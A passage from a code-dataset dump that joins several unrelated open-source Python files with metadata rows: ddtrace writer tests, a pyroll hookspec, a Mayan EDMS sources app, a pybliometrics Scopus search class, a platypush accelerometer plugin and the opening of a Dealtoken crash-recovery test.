[Span(tracer=None, name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)]
)
writer.flush_queue()
statsd.distribution.assert_has_calls(
[
mock.call("datadog.tracer.buffer.accepted.traces", 10, tags=[]),
mock.call("datadog.tracer.buffer.accepted.spans", 50, tags=[]),
mock.call("datadog.tracer.http.requests", writer.RETRY_ATTEMPTS, tags=[]),
mock.call("datadog.tracer.http.errors", 1, tags=["type:err"]),
mock.call("datadog.tracer.http.dropped.bytes", AnyInt(), tags=[]),
],
any_order=True,
)
statsd.reset_mock()
for i in range(10):
writer.write(
[Span(tracer=None, name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)]
)
writer.stop()
writer.join()
statsd.distribution.assert_has_calls(
[
mock.call("datadog.tracer.buffer.accepted.traces", 10, tags=[]),
mock.call("datadog.tracer.buffer.accepted.spans", 50, tags=[]),
mock.call("datadog.tracer.http.requests", writer.RETRY_ATTEMPTS, tags=[]),
mock.call("datadog.tracer.http.errors", 1, tags=["type:err"]),
mock.call("datadog.tracer.http.dropped.bytes", AnyInt(), tags=[]),
],
any_order=True,
)
def test_write_sync(self):
statsd = mock.Mock()
writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=True, sync_mode=True)
writer.write([Span(tracer=None, name="name", trace_id=1, span_id=j, parent_id=j - 1 or None) for j in range(5)])
statsd.distribution.assert_has_calls(
[
mock.call("datadog.tracer.buffer.accepted.traces", 1, tags=[]),
mock.call("datadog.tracer.buffer.accepted.spans", 5, tags=[]),
mock.call("datadog.tracer.http.requests", writer.RETRY_ATTEMPTS, tags=[]),
mock.call("datadog.tracer.http.errors", 1, tags=["type:err"]),
mock.call("datadog.tracer.http.dropped.bytes", AnyInt(), tags=[]),
],
any_order=True,
)
def test_drop_reason_bad_endpoint(self):
statsd = mock.Mock()
writer_metrics_reset = mock.Mock()
writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=False)
writer._metrics_reset = writer_metrics_reset
for i in range(10):
writer.write(
[Span(tracer=None, name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)]
)
writer.stop()
writer.join()
writer_metrics_reset.assert_called_once()
assert 1 == writer._metrics["http.errors"]["count"]
assert 10 == writer._metrics["http.dropped.traces"]["count"]
def test_drop_reason_trace_too_big(self):
statsd = mock.Mock()
writer_metrics_reset = mock.Mock()
writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=False)
writer._metrics_reset = writer_metrics_reset
for i in range(10):
writer.write(
[Span(tracer=None, name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)]
)
writer.write(
[Span(tracer=None, name="a" * 5000, trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(2 ** 10)]
)
writer.stop()
writer.join()
writer_metrics_reset.assert_called_once()
assert 1 == writer._metrics["buffer.dropped.traces"]["count"]
assert ["reason:t_too_big"] == writer._metrics["buffer.dropped.traces"]["tags"]
def test_drop_reason_buffer_full(self):
statsd = mock.Mock()
writer_metrics_reset = mock.Mock()
writer = AgentWriter(agent_url="http://asdf:1234", buffer_size=5300, dogstatsd=statsd, report_metrics=False)
writer._metrics_reset = writer_metrics_reset
for i in range(10):
writer.write(
[Span(tracer=None, name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)]
)
writer.write([Span(tracer=None, name="a", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)])
writer.stop()
writer.join()
writer_metrics_reset.assert_called_once()
assert 1 == writer._metrics["buffer.dropped.traces"]["count"]
assert ["reason:full"] == writer._metrics["buffer.dropped.traces"]["tags"]
def test_drop_reason_encoding_error(self):
n_traces = 10
statsd = mock.Mock()
writer_encoder = mock.Mock()
writer_encoder.__len__ = (lambda *args: n_traces).__get__(writer_encoder)
writer_metrics_reset = mock.Mock()
writer_encoder.encode.side_effect = Exception
writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=False)
writer._encoder = writer_encoder
writer._metrics_reset = writer_metrics_reset
for i in range(n_traces):
writer.write(
[Span(tracer=None, name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)]
)
writer.stop()
writer.join()
writer_metrics_reset.assert_called_once()
assert 10 == writer._metrics["encoder.dropped.traces"]["count"]
def test_keep_rate(self):
statsd = mock.Mock()
writer_run_periodic = mock.Mock()
writer_put = mock.Mock()
writer_put.return_value = Response(status=200)
writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=False)
writer.run_periodic = writer_run_periodic
writer._put = writer_put
traces = [
[Span(tracer=None, name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)]
for i in range(4)
]
traces_too_big = [
[Span(tracer=None, name="a" * 5000, trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(2 ** 10)]
for i in range(4)
]
# 1. We write 4 traces successfully.
for trace in traces:
writer.write(trace)
writer.flush_queue()
payload = msgpack.unpackb(writer_put.call_args.args[0])
# No previous drops.
assert 0.0 == writer._drop_sma.get()
# 4 traces written.
assert 4 == len(payload)
# 100% of traces kept (refers to the past).
# No traces sent before now so 100% kept.
for trace in payload:
assert 1.0 == trace[0]["metrics"].get(KEEP_SPANS_RATE_KEY, -1)
# 2. We fail to write 4 traces because of size limitation.
for trace in traces_too_big:
writer.write(trace)
writer.flush_queue()
# 50% of traces were dropped historically.
# 4 successfully written before and 4 dropped now.
assert 0.5 == writer._drop_sma.get()
# put not called since no new traces are available.
writer_put.assert_called_once()
# 3. We write 2 traces successfully.
for trace in traces[:2]:
writer.write(trace)
writer.flush_queue()
payload = msgpack.unpackb(writer_put.call_args.args[0])
# 40% of traces were dropped historically.
assert 0.4 == writer._drop_sma.get()
# 2 traces written.
assert 2 == len(payload)
# 50% of traces kept (refers to the past).
# We had 4 successfully written and 4 dropped.
for trace in payload:
assert 0.5 == trace[0]["metrics"].get(KEEP_SPANS_RATE_KEY, -1)
# 4. We write 1 trace successfully and fail to write 3.
writer.write(traces[0])
for trace in traces_too_big[:3]:
writer.write(trace)
writer.flush_queue()
payload = msgpack.unpackb(writer_put.call_args.args[0])
# 50% of traces were dropped historically.
assert 0.5 == writer._drop_sma.get()
# 1 trace written.
assert 1 == len(payload)
# 60% of traces kept (refers to the past).
# We had 4 successfully written, then 4 dropped, then 2 written.
for trace in payload:
assert 0.6 == trace[0]["metrics"].get(KEEP_SPANS_RATE_KEY, -1)
class LogWriterTests(BaseTestCase):
N_TRACES = 11
def create_writer(self):
self.output = DummyOutput()
writer = LogWriter(out=self.output)
for i in range(self.N_TRACES):
writer.write(
[Span(tracer=None, name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(7)]
)
return writer
def test_log_writer(self):
self.create_writer()
self.assertEqual(len(self.output.entries), self.N_TRACES)
def test_humansize():
assert _human_size(0) == "0B"
assert _human_size(999) == "999B"
assert _human_size(1000) == "1KB"
assert _human_size(10000) == "10KB"
assert _human_size(100000) == "100KB"
assert _human_size(1000000) == "1MB"
assert _human_size(10000000) == "10MB"
assert _human_size(1000000000) == "1GB"
class _BaseHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
error_message_format = "%(message)s\n"
error_content_type = "text/plain"
@staticmethod
def log_message(format, *args): # noqa: A002
pass
class _APIEndpointRequestHandlerTest(_BaseHTTPRequestHandler):
expected_path_prefix = None
def do_PUT(self):
if self.expected_path_prefix is not None:
assert self.path.startswith(self.expected_path_prefix)
self.send_error(200, "OK")
class _TimeoutAPIEndpointRequestHandlerTest(_BaseHTTPRequestHandler):
def do_PUT(self):
# This server sleeps longer than our timeout
time.sleep(5)
class _ResetAPIEndpointRequestHandlerTest(_BaseHTTPRequestHandler):
def do_PUT(self):
return
_HOST = "0.0.0.0"
_PORT = 8743
_TIMEOUT_PORT = _PORT + 1
_RESET_PORT = _TIMEOUT_PORT + 1
class UDSHTTPServer(socketserver.UnixStreamServer, BaseHTTPServer.HTTPServer):
def server_bind(self):
BaseHTTPServer.HTTPServer.server_bind(self)
def _make_uds_server(path, request_handler):
server = UDSHTTPServer(path, request_handler)
t = threading.Thread(target=server.serve_forever)
# Set daemon just in case something fails
t.daemon = True
t.start()
# Wait for the server to start
resp = None
while resp != 200:
conn = UDSHTTPConnection(server.server_address, _HOST, 2019)
try:
conn.request("PUT", "/")
resp = get_connection_response(conn).status
finally:
conn.close()
time.sleep(0.01)
return server, t
@pytest.fixture
def endpoint_uds_server():
socket_name = tempfile.mktemp()
handler = _APIEndpointRequestHandlerTest
server, thread = _make_uds_server(socket_name, handler)
handler.expected_path_prefix = "/v0."
try:
yield server
finally:
handler.expected_path_prefix = None
server.shutdown()
thread.join()
os.unlink(socket_name)
def _make_server(port, request_handler):
server = BaseHTTPServer.HTTPServer((_HOST, port), request_handler)
t = threading.Thread(target=server.serve_forever)
# Set daemon just in case something fails
t.daemon = True
t.start()
return server, t
@pytest.fixture(scope="module")
def endpoint_test_timeout_server():
server, thread = _make_server(_TIMEOUT_PORT, _TimeoutAPIEndpointRequestHandlerTest)
try:
yield thread
finally:
server.shutdown()
thread.join()
@pytest.fixture(scope="module")
def endpoint_test_reset_server():
server, thread = _make_server(_RESET_PORT, _ResetAPIEndpointRequestHandlerTest)
try:
yield thread
finally:
server.shutdown()
thread.join()
@pytest.fixture
def endpoint_assert_path():
handler = _APIEndpointRequestHandlerTest
server, thread = _make_server(_PORT, handler)
def configure(expected_path_prefix=None):
handler.expected_path_prefix = expected_path_prefix
return thread
try:
yield configure
finally:
handler.expected_path_prefix = None
server.shutdown()
thread.join()
def test_agent_url_path(endpoint_assert_path):
# test without base path
endpoint_assert_path("/v0.")
writer = AgentWriter(agent_url="http://%s:%s/" % (_HOST, _PORT))
writer._encoder.put([Span(None, "foobar")])
writer.flush_queue(raise_exc=True)
# test without base path nor trailing slash
writer = AgentWriter(agent_url="http://%s:%s" % (_HOST, _PORT))
writer._encoder.put([Span(None, "foobar")])
writer.flush_queue(raise_exc=True)
# test with a base path
endpoint_assert_path("/test/v0.")
writer = AgentWriter(agent_url="http://%s:%s/test/" % (_HOST, _PORT))
writer._encoder.put([Span(None, "foobar")])
writer.flush_queue(raise_exc=True)
def test_flush_connection_timeout_connect():
writer = AgentWriter(agent_url="http://%s:%s" % (_HOST, 2019))
if PY3:
exc_type = OSError
else:
exc_type = socket.error
with pytest.raises(exc_type):
writer._encoder.put([Span(None, "foobar")])
writer.flush_queue(raise_exc=True)
def test_flush_connection_timeout(endpoint_test_timeout_server):
writer = AgentWriter(agent_url="http://%s:%s" % (_HOST, _TIMEOUT_PORT))
with pytest.raises(socket.timeout):
writer._encoder.put([Span(None, "foobar")])
writer.flush_queue(raise_exc=True)
def test_flush_connection_reset(endpoint_test_reset_server):
writer = AgentWriter(agent_url="http://%s:%s" % (_HOST, _RESET_PORT))
if PY3:
exc_types = (httplib.BadStatusLine, ConnectionResetError)
else:
exc_types = (httplib.BadStatusLine,)
with pytest.raises(exc_types):
writer._encoder.put([Span(None, "foobar")])
writer.flush_queue(raise_exc=True)
def test_flush_connection_uds(endpoint_uds_server):
writer = AgentWriter(agent_url="unix://%s" % endpoint_uds_server.server_address)
writer._encoder.put([Span(None, "foobar")])
writer.flush_queue(raise_exc=True)
def test_flush_queue_raise():
writer = AgentWriter(agent_url="http://dne:1234")
# Should not raise
writer.write([])
writer.flush_queue(raise_exc=False)
error = OSError if PY3 else IOError
with pytest.raises(error):
writer.write([])
writer.flush_queue(raise_exc=True)
def test_racing_start():
writer = AgentWriter(agent_url="http://dne:1234")
def do_write(i):
writer.write([Span(None, str(i))])
ts = [threading.Thread(target=do_write, args=(i,)) for i in range(100)]
for t in ts:
t.start()
for t in ts:
t.join()
assert len(writer._encoder) == 100
def test_additional_headers():
with override_env(dict(_DD_TRACE_WRITER_ADDITIONAL_HEADERS="additional-header:additional-value,header2:value2")):
writer = AgentWriter(agent_url="http://localhost:9126")
assert writer._headers["additional-header"] == "additional-value"
assert writer._headers["header2"] == "value2"
def test_bad_encoding(monkeypatch):
monkeypatch.setenv("DD_TRACE_API_VERSION", "foo")
with pytest.raises(ValueError):
AgentWriter(agent_url="http://localhost:9126")
| 35 | 120 | 0.634943 |
acfb5b09345a7e7e63d26c77aa093c06e7492606 | 220 | py | Python | pyroll/core/transport/hookspecs/out_profile.py | pyroll-project/pyroll-core | f59094d58c2f7493ddc6345b3afc4700ca259681 | [
"BSD-3-Clause"
] | null | null | null | pyroll/core/transport/hookspecs/out_profile.py | pyroll-project/pyroll-core | f59094d58c2f7493ddc6345b3afc4700ca259681 | [
"BSD-3-Clause"
] | null | null | null | pyroll/core/transport/hookspecs/out_profile.py | pyroll-project/pyroll-core | f59094d58c2f7493ddc6345b3afc4700ca259681 | [
"BSD-3-Clause"
] | null | null | null | from ..transport import Transport
@Transport.OutProfile.hookspec
def strain(transport: Transport, profile: Transport.OutProfile) -> float:
"""The equivalent strain of the outgoing profile of the transport unit."""
| 31.428571 | 78 | 0.772727 |
acfb5d67247fa0a6061e2a912753d57cc0e6846f | 5,813 | py | Python | mayan/apps/sources/apps.py | nadwiabd/insight_edms | 90a09d7ca77cb111c791e307b55a603e82042dfe | [
"Apache-2.0"
] | null | null | null | mayan/apps/sources/apps.py | nadwiabd/insight_edms | 90a09d7ca77cb111c791e307b55a603e82042dfe | [
"Apache-2.0"
] | null | null | null | mayan/apps/sources/apps.py | nadwiabd/insight_edms | 90a09d7ca77cb111c791e307b55a603e82042dfe | [
"Apache-2.0"
] | null | null | null | from __future__ import absolute_import, unicode_literals
from django.utils.translation import ugettext_lazy as _
from kombu import Exchange, Queue
from common import (
MayanAppConfig, MissingItem, menu_object, menu_secondary, menu_sidebar,
menu_setup
)
from common.signals import post_initial_setup, post_upgrade
from converter.links import link_transformation_list
from documents.menus import menu_documents
from documents.signals import post_version_upload
from mayan.celery import app
from navigation import SourceColumn
from rest_api.classes import APIEndPoint
from .classes import StagingFile
from .handlers import (
copy_transformations_to_version, create_default_document_source,
initialize_periodic_tasks
)
from .links import (
link_document_create_multiple, link_setup_sources,
link_setup_source_check_now, link_setup_source_create_imap_email,
link_setup_source_create_pop3_email, link_setup_source_create_watch_folder,
link_setup_source_create_webform, link_setup_source_create_staging_folder,
link_setup_source_delete, link_setup_source_edit, link_setup_source_logs,
link_staging_file_delete, link_upload_version
)
from .widgets import StagingFileThumbnailWidget
class SourcesApp(MayanAppConfig):
has_tests = True
name = 'sources'
verbose_name = _('Sources')
def ready(self):
super(SourcesApp, self).ready()
POP3Email = self.get_model('POP3Email')
IMAPEmail = self.get_model('IMAPEmail')
Source = self.get_model('Source')
SourceLog = self.get_model('SourceLog')
StagingFolderSource = self.get_model('StagingFolderSource')
WatchFolderSource = self.get_model('WatchFolderSource')
WebFormSource = self.get_model('WebFormSource')
APIEndPoint(app=self, version_string='1')
MissingItem(
label=_('Create a document source'),
description=_(
'Document sources are the way in which new documents are '
'feed to Mayan EDMS, create at least a web form source to '
'be able to upload documents from a browser.'
),
condition=lambda: not Source.objects.exists(),
view='sources:setup_source_list'
)
SourceColumn(
source=StagingFile,
label=_('Created'),
func=lambda context: context['object'].get_date_time_created()
)
html_widget = StagingFileThumbnailWidget()
SourceColumn(
source=StagingFile,
label=_('Thumbnail'),
func=lambda context: html_widget.render(
instance=context['object'],
)
)
SourceColumn(
source=SourceLog,
label=_('Date time'),
func=lambda context: context['object'].datetime
)
SourceColumn(
source=SourceLog,
label=_('Message'),
func=lambda context: context['object'].message
)
app.conf.CELERY_QUEUES.extend(
(
Queue(
'sources', Exchange('sources'), routing_key='sources'
),
Queue(
'sources_periodic', Exchange('sources_periodic'),
routing_key='sources_periodic', delivery_mode=1
),
)
)
app.conf.CELERY_ROUTES.update(
{
'sources.tasks.task_check_interval_source': {
'queue': 'sources_periodic'
},
'sources.tasks.task_source_handle_upload': {
'queue': 'sources'
},
'sources.tasks.task_upload_document': {
'queue': 'sources'
},
}
)
menu_documents.bind_links(links=(link_document_create_multiple,))
menu_object.bind_links(
links=(
link_setup_source_edit, link_setup_source_delete,
link_transformation_list, link_setup_source_logs
), sources=(
POP3Email, IMAPEmail, StagingFolderSource, WatchFolderSource,
WebFormSource
)
)
menu_object.bind_links(
links=(link_staging_file_delete,), sources=(StagingFile,)
)
menu_object.bind_links(
links=(link_setup_source_check_now,),
sources=(IMAPEmail, POP3Email, WatchFolderSource,)
)
menu_secondary.bind_links(
links=(
link_setup_sources, link_setup_source_create_webform,
link_setup_source_create_staging_folder,
link_setup_source_create_pop3_email,
link_setup_source_create_imap_email,
link_setup_source_create_watch_folder
), sources=(
POP3Email, IMAPEmail, StagingFolderSource, WatchFolderSource,
WebFormSource, 'sources:setup_source_list',
'sources:setup_source_create'
)
)
menu_setup.bind_links(links=(link_setup_sources,))
menu_sidebar.bind_links(
links=(link_upload_version,),
sources=(
'documents:document_version_list', 'documents:upload_version',
'documents:document_version_revert'
)
)
post_upgrade.connect(
initialize_periodic_tasks,
dispatch_uid='initialize_periodic_tasks'
)
post_initial_setup.connect(
create_default_document_source,
dispatch_uid='create_default_document_source'
)
post_version_upload.connect(
copy_transformations_to_version,
dispatch_uid='copy_transformations_to_version'
)
| 34.808383 | 79 | 0.623086 |
acfb5dd7cc8d8ef97ebf34b1bb575b1f1438f091 | 11,149 | py | Python | pybliometrics/scopus/scopus_search.py | raffaem/pybliometrics | aaa84885c2770ee29b23e1d1a41448d42f6db15e | [
"MIT"
] | null | null | null | pybliometrics/scopus/scopus_search.py | raffaem/pybliometrics | aaa84885c2770ee29b23e1d1a41448d42f6db15e | [
"MIT"
] | null | null | null | pybliometrics/scopus/scopus_search.py | raffaem/pybliometrics | aaa84885c2770ee29b23e1d1a41448d42f6db15e | [
"MIT"
] | null | null | null | from collections import namedtuple
from typing import List, NamedTuple, Optional, Tuple, Union
from pybliometrics.scopus.superclasses import Search
from pybliometrics.scopus.utils import check_integrity, chained_get,\
check_parameter_value, check_field_consistency, listify, make_search_summary
class ScopusSearch(Search):
@property
def results(self) -> Optional[List[NamedTuple]]:
"""A list of namedtuples in the form (eid doi pii pubmed_id title
subtype subtypeDescription creator afid affilname affiliation_city
affiliation_country author_count author_names author_ids author_afids
coverDate coverDisplayDate publicationName issn source_id eIssn
aggregationType volume issueIdentifier article_number pageRange
description authkeywords citedby_count openaccess freetoread
freetoreadLabel fund_acr fund_no fund_sponsor).
Field definitions correspond to
https://dev.elsevier.com/guides/ScopusSearchViews.htm and return the
values as-is, except for afid, affilname, affiliation_city,
affiliation_country, author_names, author_ids and author_afids: These
information are joined on ";". In case an author has multiple
affiliations, they are joined on "-"
(e.g. Author1Aff;Author2Aff1-Author2Aff2).
Raises
------
ValueError
If the elements provided in integrity_fields do not match the
actual field names (listed above).
Notes
-----
The list of authors and the list of affiliations per author are
deduplicated.
"""
# Initiate namedtuple with ordered list of fields
fields = 'eid doi pii pubmed_id title subtype subtypeDescription ' \
'creator afid affilname affiliation_city affiliation_country ' \
'author_count author_names author_ids author_afids coverDate '\
'coverDisplayDate publicationName issn source_id eIssn '\
'aggregationType volume issueIdentifier article_number '\
'pageRange description authkeywords citedby_count '\
'openaccess freetoread freetoreadLabel fund_acr fund_no fund_sponsor'
doc = namedtuple('Document', fields)
check_field_consistency(self._integrity, fields)
# Parse elements one-by-one
out = []
for item in self._json:
info = {}
# Parse affiliations
info["affilname"] = _join(item, 'affilname')
info["afid"] = _join(item, 'afid')
info["aff_city"] = _join(item, 'affiliation-city')
info["aff_country"] = _join(item, 'affiliation-country')
# Parse authors
try:
# Deduplicate list of authors
authors = _deduplicate(item['author'])
# Extract information
surnames = _replace_none([d['surname'] for d in authors])
firstnames = _replace_none([d['given-name'] for d in authors])
info["auth_names"] = ";".join([", ".join([t[0], t[1]]) for t in
zip(surnames, firstnames)])
info["auth_ids"] = ";".join([d['authid'] for d in authors])
affs = []
for auth in authors:
aff = listify(_deduplicate(auth.get('afid', [])))
affs.append('-'.join([d['$'] for d in aff]))
info["auth_afid"] = (';'.join(affs) or None)
except KeyError:
pass
date = item.get('prism:coverDate')
if isinstance(date, list):
date = date[0].get('$')
default = [None, {"$": None}]
freetoread = chained_get(item, ["freetoread", "value"], default)
freetoreadLabel = chained_get(item, ["freetoreadLabel", "value"], default)
new = doc(article_number=item.get('article-number'),
title=item.get('dc:title'), fund_no=item.get('fund-no'),
fund_sponsor=item.get('fund-sponsor'),
subtype=item.get('subtype'), doi=item.get('prism:doi'),
subtypeDescription=item.get('subtypeDescription'),
issn=item.get('prism:issn'), creator=item.get('dc:creator'),
affilname=info.get("affilname"),
author_names=info.get("auth_names"),
coverDate=date, volume=item.get('prism:volume'),
coverDisplayDate=item.get('prism:coverDisplayDate'),
publicationName=item.get('prism:publicationName'),
source_id=item.get('source-id'), author_ids=info.get("auth_ids"),
aggregationType=item.get('prism:aggregationType'),
issueIdentifier=item.get('prism:issueIdentifier'),
pageRange=item.get('prism:pageRange'),
author_afids=info.get("auth_afid"),
affiliation_country=info.get("aff_country"),
citedby_count=int(item['citedby-count']),
openaccess=int(item['openaccess']),
freetoread=freetoread[-1]["$"],
freetoreadLabel=freetoreadLabel[-1]["$"],
eIssn=item.get('prism:eIssn'),
author_count=item.get('author-count', {}).get('$'),
affiliation_city=info.get("aff_city"), afid=info.get("afid"),
description=item.get('dc:description'), pii=item.get('pii'),
authkeywords=item.get('authkeywords'), eid=item.get('eid'),
fund_acr=item.get('fund-acr'), pubmed_id=item.get('pubmed-id'))
out.append(new)
# Finalize
check_integrity(out, self._integrity, self._action)
return out or None
def __init__(self,
query: str,
refresh: Union[bool, int] = False,
view: str = None,
verbose: bool = False,
download: bool = True,
integrity_fields: Union[List[str], Tuple[str, ...]] = None,
integrity_action: str = "raise",
subscriber: bool = True,
**kwds: str
) -> None:
"""Interaction with the Scopus Search API.
:param query: A string of the query as used in the Advanced Search
on scopus.com. All fields except "INDEXTERMS()" and
"LIMIT-TO()" work.
:param refresh: Whether to refresh the cached file if it exists or not.
If int is passed, cached file will be refreshed if the
number of days since last modification exceeds that value.
:param view: Which view to use for the query, see
https://dev.elsevier.com/sc_search_views.html.
Allowed values: STANDARD, COMPLETE. If None, defaults to
COMPLETE if `subscriber=True` and to STANDARD if
`subscriber=False`.
:param verbose: Whether to print a download progress bar.
:param download: Whether to download results (if they have not been
cached).
:param integrity_fields: Names of fields whose completeness should
be checked. ScopusSearch will perform the
action specified in `integrity_action` if
elements in these fields are missing. This
helps avoiding idiosynchratically missing
elements that should always be present
(e.g., EID or source ID).
:param integrity_action: What to do in case integrity of provided fields
cannot be verified. Possible actions:
- "raise": Raise an AttributeError
- "warn": Raise a UserWarning
:param subscriber: Whether you access Scopus with a subscription or not.
For subscribers, Scopus's cursor navigation will be
used. Sets the number of entries in each query
iteration to the maximum number allowed by the
corresponding view.
:param kwds: Keywords passed on as query parameters. Must contain
fields and values mentioned in the API specification at
https://dev.elsevier.com/documentation/ScopusSearchAPI.wadl.
Raises
------
ScopusQueryError
For non-subscribers, if the number of search results exceeds 5000.
ValueError
If any of the parameters `integrity_action`, `refresh` or `view`
is not one of the allowed values.
Notes
-----
The directory for cached results is `{path}/{view}/{fname}`,
where `path` is specified in your configuration file and `fname` is
the md5-hashed version of `query`.
"""
# Checks
if view:
check_parameter_value(view, ('STANDARD', 'COMPLETE'), "view")
allowed = ("warn", "raise")
check_parameter_value(integrity_action, allowed, "integrity_action")
# Parameters
if not view:
if subscriber:
view = "COMPLETE"
else:
view = "STANDARD"
count = 25
if view == "STANDARD" and subscriber:
count = 200
if "cursor" in kwds:
subscriber = kwds["cursor"]
kwds.pop("cursor")
if "count" in kwds:
count = kwds["count"]
kwds.pop("count")
# Query
self._action = integrity_action
self._integrity = integrity_fields or []
self._refresh = refresh
self._query = query
self._view = view
Search.__init__(self, query=query, api='ScopusSearch', count=count,
cursor=subscriber, download=download,
verbose=verbose, **kwds)
def __str__(self):
"""Print a summary string."""
return make_search_summary(self, "document", self.get_eids())
def get_eids(self):
"""EIDs of retrieved documents."""
return [d['eid'] for d in self._json]
def _deduplicate(lst):
"""Auxiliary function to deduplicate lst."""
out = []
for i in lst:
if i not in out:
out.append(i)
return out
def _join(item, key, sep=";"):
"""Auxiliary function to join same elements of a list of dictionaries if
the elements are not None.
"""
try:
return sep.join([d[key] or "" for d in item["affiliation"]])
except (KeyError, TypeError):
return None
def _replace_none(lst, repl=""):
"""Auxiliary function to replace None's with another value."""
return [repl if v is None else v for v in lst]
| 47.042194 | 87 | 0.564445 |
acfb5e81f02d1e690c8f73df5337d5ec57054af3 | 2,096 | py | Python | platypush/plugins/gpio/sensor/accelerometer/__init__.py | BlackLight/platypush | 6c0a8bf2599eb4ab41a6122dbd988075d8b1a63a | [
"MIT"
] | 228 | 2018-01-30T11:17:09.000Z | 2022-03-24T11:22:26.000Z | platypush/plugins/gpio/sensor/accelerometer/__init__.py | BlackLight/platypush | 6c0a8bf2599eb4ab41a6122dbd988075d8b1a63a | [
"MIT"
] | 167 | 2017-12-11T19:35:38.000Z | 2022-03-27T14:45:30.000Z | platypush/plugins/gpio/sensor/accelerometer/__init__.py | BlackLight/runbullet | 8d26c8634d2677b4402f0a21b9ab8244b44640db | [
"MIT"
] | 16 | 2018-05-03T07:31:56.000Z | 2021-12-05T19:27:37.000Z | from platypush.plugins import action
from platypush.plugins.gpio.sensor import GpioSensorPlugin
class GpioSensorAccelerometerPlugin(GpioSensorPlugin):
"""
Plugin to interact with an accelerometer sensor and get X,Y,Z position.
Tested with Adafruit LIS3DH accelerometer (https://www.adafruit.com/product/2809)
with Raspberry Pi over I2C connection.
Requires:
* ``Adafruit-GPIO`` (``pip install Adafruit-GPIO``)
"""
def __init__(self, g=4, precision=None, **kwargs):
"""
Only LIS3DH in I2C mode is currently supported: https://learn.adafruit.com/assets/59080.
:param g: Accelerometer range as a multiple of G - can be 2G, 4G, 8G or 16G
:type g: int
:param precision: If set, the position values will be rounded to the specified number of decimal digits
(default: no rounding)
:type precision: int
"""
super().__init__(**kwargs)
from platypush.plugins.gpio.sensor.accelerometer.lib.LIS3DH import LIS3DH
if g == 2:
self.g = LIS3DH.RANGE_2G
elif g == 4:
self.g = LIS3DH.RANGE_4G
elif g == 8:
self.g = LIS3DH.RANGE_8G
elif g == 16:
self.g = LIS3DH.RANGE_16G
else:
raise RuntimeError('Invalid G range: {}'.format(g))
self.precision = precision
self.sensor = LIS3DH()
self.sensor.setRange(self.g)
@action
def get_measurement(self):
"""
Extends :func:`.GpioSensorPlugin.get_measurement`
:returns: The sensor's current position as a dictionary with the three components (x,y,z) in degrees, each
between -90 and 90
"""
values = [
(pos*100 if self.precision is None else round(pos*100, self.precision))
for pos in (self.sensor.getX(), self.sensor.getY(), self.sensor.getZ())
]
return {
'name': 'position',
'value': {
'x': values[0], 'y': values[1], 'z': values[2]
}
}
# vim:sw=4:ts=4:et:
| 30.376812 | 114 | 0.591603 |
acfb5f157530fd1d544e4a420cd2b3864566d344 | 13,430 | py | Python | test/functional/dbcrash.py | wolfoxonly/dk | 090c9862a1a14c187eefcb8285e43601db5ed35b | [
"MIT"
] | null | null | null | test/functional/dbcrash.py | wolfoxonly/dk | 090c9862a1a14c187eefcb8285e43601db5ed35b | [
"MIT"
] | null | null | null | test/functional/dbcrash.py | wolfoxonly/dk | 090c9862a1a14c187eefcb8285e43601db5ed35b | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2017 The Dealtoken Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test recovery from a crash during chainstate writing.
- 4 nodes
* node0, node1, and node2 will have different dbcrash ratios, and different
dbcache sizes
* node3 will be a regular node, with no crashing.
* The nodes will not connect to each other.
- use default test framework starting chain. initialize starting_tip_height to
tip height.
- Main loop:
* generate lots of transactions on node3, enough to fill up a block.
* uniformly randomly pick a tip height from starting_tip_height to
tip_height; with probability 1/(height_difference+4), invalidate this block.
* mine enough blocks to overtake tip_height at start of loop.
* for each node in [node0,node1,node2]:
- for each mined block:
* submit block to node
* if node crashed on/after submitting:
- restart until recovery succeeds
- check that utxo matches node3 using gettxoutsetinfo"""
import errno
import http.client
import random
import sys
import time
from test_framework.mininode import *
from test_framework.script import *
from test_framework.test_framework import DealtokenTestFramework
from test_framework.util import *
HTTP_DISCONNECT_ERRORS = [http.client.CannotSendRequest]
try:
HTTP_DISCONNECT_ERRORS.append(http.client.RemoteDisconnected)
except AttributeError:
pass
class ChainstateWriteCrashTest(DealtokenTestFramework):
def set_test_params(self):
self.num_nodes = 4
self.setup_clean_chain = False
# Set -maxmempool=0 to turn off mempool memory sharing with dbcache
# Set -rpcservertimeout=900 to reduce socket disconnects in this
# long-running test
self.base_args = ["-limitdescendantsize=0", "-maxmempool=0", "-rpcservertimeout=900", "-dbbatchsize=200000"]
# Set different crash ratios and cache sizes. Note that not all of
# -dbcache goes to pcoinsTip.
self.node0_args = ["-dbcrashratio=8", "-dbcache=4"] + self.base_args
self.node1_args = ["-dbcrashratio=16", "-dbcache=8"] + self.base_args
self.node2_args = ["-dbcrashratio=24", "-dbcache=16"] + self.base_args
# Node3 is a normal node with default args, except will mine full blocks
self.node3_args = ["-blockmaxweight=4000000"]
self.extra_args = [self.node0_args, self.node1_args, self.node2_args, self.node3_args]
def setup_network(self):
# Need a bit of extra time for the nodes to start up for this test
self.add_nodes(self.num_nodes, extra_args=self.extra_args, timewait=90)
self.start_nodes()
# Leave them unconnected, we'll use submitblock directly in this test
def restart_node(self, node_index, expected_tip):
"""Start up a given node id, wait for the tip to reach the given block hash, and calculate the utxo hash.
Exceptions on startup should indicate node crash (due to -dbcrashratio), in which case we try again. Give up
